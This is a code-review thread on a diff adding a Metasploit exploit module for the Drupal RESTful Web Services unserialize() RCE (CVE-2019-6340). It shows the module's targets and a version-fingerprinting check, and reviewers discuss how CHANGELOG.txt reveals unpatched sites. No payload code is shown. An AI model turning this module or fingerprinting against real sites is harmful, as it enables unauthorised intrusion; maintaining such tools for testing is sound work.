modules/exploits/unix/webapp/drupal_restws_unserialize.rb

```diff
@@ -0,0 +1,213 @@
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  # 1. All (four) Web Services modules need to be enabled
+  # 2. Nodes are cached, meaning one exploit attempt per node
+  Rank = AverageRanking
+
+  include Msf::Exploit::Remote::HTTP::Drupal
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Drupal RESTful Web Services unserialize() RCE',
+      'Description'    => %q{
+        This module exploits a PHP unserialize() vulnerability in Drupal RESTful
+        Web Services by sending a GET request to Drupal's /node REST endpoint.
+
+        Drupal < 8.5.11 and < 8.6.10 are vulnerable.
+      },
+      'Author'         => [
+        'Jasper Mattsson', # Discovery
+        'Charles Fol',     # PoC
+        'Rotem Reiss',     # Module
+        'wvu'              # Module
+      ],
+      'References'     => [
+        ['CVE', '2019-6340'],
+        ['URL', 'https://www.drupal.org/sa-core-2019-003'],
+        ['URL', 'https://www.ambionics.io/blog/drupal8-rce'],
+        ['URL', 'https://github.com/ambionics/phpggc'],
+        ['URL', 'https://twitter.com/jcran/status/1099206271901798400']
+      ],
+      'DisclosureDate' => '2019-02-20',
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['php', 'unix'],
+      'Arch'           => [ARCH_PHP, ARCH_CMD],
+      'Privileged'     => false,
+      'Targets'        => [
+        ['PHP In-Memory',
+          'Platform'   => 'php',
+          'Arch'       => ARCH_PHP,
+          'Type'       => :php_memory,
+          'Payload'    => {'BadChars' => "'"}
+        ],
+        ['Unix In-Memory',
+          'Platform'   => 'unix',
+          'Arch'       => ARCH_CMD,
+          'Type'       => :unix_memory
+        ]
+      ],
+      'DefaultTarget'  => 0,
+      'Notes'          => {
+        'Stability'    => [CRASH_SAFE],
+        'SideEffects'  => [IOC_IN_LOGS],
+        'Reliablity'   => [UNRELIABLE_SESSION],
+        'AKA'          => ['SA-CORE-2019-003']
+      }
+    ))
+
+    register_options([
+      OptInt.new('NODE', [true, 'Node ID to target', 1])
+    ])
+
+    register_advanced_options([
+      OptBool.new('ForceExploit', [false, 'Override check result', false])
+    ])
+  end
+
+  def check
+    checkcode = CheckCode::Unknown
+
+    version = drupal_version.to_s
+
+    if version.empty?
+      vprint_error('Could not determine Drupal version')
+      return checkcode
+    end
+
+    if version =~ /^8\b/
+      vprint_status("Drupal #{version} targeted at #{full_uri}")
+      checkcode = CheckCode::Detected
+    else
+      vprint_error("Drupal #{version} is not supported")
+      return CheckCode::Safe
+    end
+
+    changelog = drupal_changelog(version)
+
+    unless changelog
+      vprint_error('Could not determine Drupal patch level')
+      return checkcode
+    end
+
+    if changelog.include?('SA-CORE-2019-003')
```

Comment:
Drupal's changelog doesn't contain information about the current Drupal version anymore.
We can only conclude that Drupal is unpatched by finding a match to an old string that was there before the CHANGELOG.txt change (the one that removed the information about the current version), but I think it's a bit hacky.

Reply:
Yep, I noted that on work Slack.

```
####################
# Request:
####################
GET /core/CHANGELOG.txt HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded


####################
# Response:
####################
HTTP/1.1 200 OK
Date: Tue, 05 Mar 2019 18:25:22 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Fri, 08 Feb 2019 12:21:40 GMT
ETag: "18f-581610046bd00"
Accept-Ranges: bytes
Content-Length: 399
Vary: Accept-Encoding
Content-Type: text/plain

New minor (feature) releases of Drupal 8 are released every six months and
patch (bugfix) releases are released every month. More information on the
Drupal 8 release cycle: https://www.drupal.org/core/release-cycle-overview

* For a full list of fixes in the latest release, visit:
 https://www.drupal.org/8/download
* API change records for Drupal core:
 https://www.drupal.org/list-changes/drupal
```

Reply:
Do you remember when they changed it? Older vulnerable versions may still have it, which is why I hesitated to remove the check. We'd probably want to adapt the mixin, not the modules.

Reply:
Yes, you can find it here: https://www.drupal.org/project/drupal/issues/2647824